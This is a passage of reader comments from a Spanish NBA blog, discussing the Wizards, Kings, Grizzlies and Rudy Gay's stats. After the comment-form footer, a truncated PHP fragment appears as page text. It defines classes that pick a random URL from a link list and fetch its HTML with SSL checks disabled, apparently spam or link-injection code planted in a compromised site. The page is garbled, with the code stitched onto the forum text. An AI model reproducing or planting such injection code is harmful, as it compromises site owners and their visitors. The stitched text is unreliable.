    Bueno, esta noche me he visto al principio a los Sixers apalizar a los tristísimos Wizards. Yo fui de los que apostó por ellos en el análisis, que por cierto, creo que fue el primero en ser publicado. Pero vamos, está claro que me equivoqué. Si acaso, el espectáculo que augurábamos lo dan los equipos que juegan contra ellos, aprovechando el lamentable estado de estos tíos. Bueno, no sé por qué están tardando tanto en echar a Flip Saunders. Por favor, que se vaya ya, hoy mejor que mañana. En fin…

    Y ahora estoy acabando con los Kings en casa de los Blazers. No sé por qué, Blazers es un equipo que odio profundamente, y además sospecho que no puedo basarme en ningún dato concreto. Les odio por su concepción de puto equipo aguerrido. Supongo que como siempre nos dan palizas a los Kings, y el h…. de p…. de Wallace promedia casi 30 puntos contra su ex equipo, es decir, los Kings, les tengo una manía que no les puedo ni ver. Ya podía aplicarse el señor Outlaw y motivarse también contra sus ex… pero vaya temporadita lleva el chaval. Smart tampoco encuentra al alero titular. Y eso que son un puñao. Véase: Salmons, Greene, García, Outlaw… que la pregunta sería, ¿realmente alguno de estos le puede valer a un equipo que quiere aspirar a Playoffs? Y no lo digo por los Kings, que visto lo visto sería una herejía verles jugar un partido en el mes de junio, sino por el fiera que les ha visto posibilidades en un equipo que clama la cielo la necesidad de un base, para liberar al señor Evans como escolta, su posición natural. Yo creo que ahora mismo traspasar a Thornton+Salmons a cambio de un alero de renombre, o un base que sepa llevar un equipo, sería la clave. No obstante, difícil está

      Citar

  41. Sancho88 dice:
    #41

    Bueno, y para terminar, final apretadísimo entre Memphis y Golden State después de ir todo el partido los Warriors ganando de más de 10. Y aquí lanzo una pregunta que personalmente me parece muy pertinente hacer: ¿Es Rudy Gay un verdadero jugador franquicia?

    Emito mi juicio, a sabiendas de que me vais a coser a palos. Yo digo que no. No ha demostrado que con él en la cancha el equipo sea ganador. Todo el mundo está de acuerdo en que la clave del equipo es Marc, y además creo que se arruga en los momentos finales. Se abre la veda

      Citar

  42. Sancho88 dice:
    #42

    Bueno, me he adelantado porque al final ha metido la canasta clave para la victoria de Grizzlies, xd. Pero no, en serio. Tiene unos porcentajes de tiro bajísimos, y no creo que un jugador franquicia pueda anotar menos de 20 puntos por partido con esos porcentajes. En mi opinión, si no estuvieran Marc y Conley, este tío solo no sería capaz de nada

      Citar

  43. Sancho88 dice:
    #43

    Y dejo estos últimos datos sacados del ranking de eficiencia y me voy a dormir

    GP MPG PTS EFF RPG APG STPG BLKPG EFF48M EFF

    58 Rudy Gay , MEM 15 35.9 18.6 16.1 6.0 1.9 1.5 0.67 21.59 16.1

    59 Samuel Dalembert , HOU 16 24.7 9.0 16.1 7.9 .5 0.7 2.0 31.35 16.1

    60 DeAndre Jordan , LAC 14 30.8 8.0 16.1 8.6 .2 0.8 3.0 25.12 16.1

      Citar

  44. Denise dice:
    #44

    56 puntos de Orlando en el Boston. Menuda fiesta se pegarían tras el partido contra Los Ángeles.

    Parece como si este partido lo hubieran dado por perdido antes de jugarlo, en algunas fases del partido iban perdiendo de 20 y se estaban partiendo el culo de risa
    Y ojo, que en una jugada han llegado a jugar con 4 jugadores, lo que dice mucho del nivel de concentración del equipo y de Van Gundy para este partido

      Citar

  45. The wolf dice:
    #45

    lo de memphis ha sido espectacular…han ido perdiendo de 20 a 3 minutos para acabar el tercer cuarto…y le han metido 40 puntos en el ultimo a los warriors para acabar ganando por 1 aunque muy fallones en el tiro los ositos en lineas generales el ultimo cuarto es una gozada

      Citar

  46. melo15 dice:
    #46

    Sancho a mi me encanta tambien los Kings!!!
    Tyreke Evans es el amo, aver si se recupera y empieza a promediar 20-5-5 jejejejeje
    Y Cousins es un pedazo de pivot, en el 2k e cambiado a Feredette por Kemba jejejej y he cambiado a Salmons y Outlaw por Thaddeus Young este no era trampa, y despues tengo a un tal Pekovic de los Nuggs de recambio de Cousins, BRUTAL estoy 7 en el oeste

      Citar

  47. simon dice:
    #47

    si, a ver si es verdad que se recupera evans, que me está lastrando bastante en las hoops.

      Citar

  48. rumbero dice:
    #48

    Sancho88:
    Bueno, esta noche me he visto al principio a los Sixers apalizar a los tristísimos Wizards. Yo fui de los que apostó por ellos en el análisis, que por cierto, creo que fue el primero en ser publicado. Pero vamos, está claro que me equivoqué. Si acaso, el espectáculo que augurábamos lo dan los equipos que juegan contra ellos, aprovechando el lamentable estado de estos tíos. Bueno, no sé por qué están tardando tanto en echar a Flip Saunders. Por favor, que se vaya ya, hoy mejor que mañana. En fin…

    Yo también apostaba por una buena temporada suya por el talento que se presupone que tiene la plantilla, pero es que luego los ves jugar y es un equipo desesperante. O se alinean los astros o les caen más de 100 puntos por partido sin que el equipo rival haga nada espectacular (como ayer los SIxers). Y en ataque es que son todos un agujero negro, con Michael Jordan Crawford y Young a la cabeza, es llegarles la bola y ya nunca más se supo de ella. Nose a que esperan para largar a Saunders y intentar traer a alguien que amueble un poco la cabeza a tanto poyuelo.
    Y para poyuelo Tim Duncan. Enorme. Hoy con una de esas actuaciones a las que nos tenía acostumbrados no hace tanto. Menudo ganchito a la remanguillé para dar la victoria…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>